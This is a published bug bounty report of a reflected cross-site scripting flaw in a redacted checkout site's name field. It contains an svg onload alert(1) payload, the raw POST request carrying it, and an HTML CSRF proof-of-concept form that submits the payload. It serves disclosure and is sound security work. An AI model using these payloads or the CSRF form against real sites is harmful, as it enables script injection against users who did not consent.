Reflected Cross Site Scripting

  • Reported to Private
  • Reported by Haqtify
  • Medium (5.1)
  • $400
  • Published 5 months ago
  • No Likes

URL:

https://checkout.redacted.com/

Description:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

‘”><svg/onload=alert(1)>

Steps To Reproduce:

1. Goto this URL.

https://checkout.redacted.com/

2.Insert XSS payload in name.

3. XSS Executed.

REQUEST :

POST /calculate-checkout HTTP/1.1
Host: checkout.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Upgrade-Insecure-Requests: 1

name=dsdssdsd'”><svg/onload=alert(1)>&practiceName=ffffddf&mobile=%2B44+07366507512&email=email%40gmail.com&plan=STANDARD

XSS CSRF POC:

<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”https://checkout.redacted.com/calculate-checkout” method=”POST”>
<input type=”hidden” name=”name” value=”dsdssdsd&apos;&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;1&#41;&gt;” />
<input type=”hidden” name=”practiceName” value=”ffffddf” />
<input type=”hidden” name=”mobile” value=”&#43;44&#32;07366507512″ />
<input type=”hidden” name=”email” value=”email&#64;gmail&#46;com” />
<input type=”hidden” name=”plan” value=”STANDARDPRACTICE” />
<input type=”hidden” name=”integration” value=”soe” />
<input type=”hidden” name=”coupon” value=”erererer” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

POC: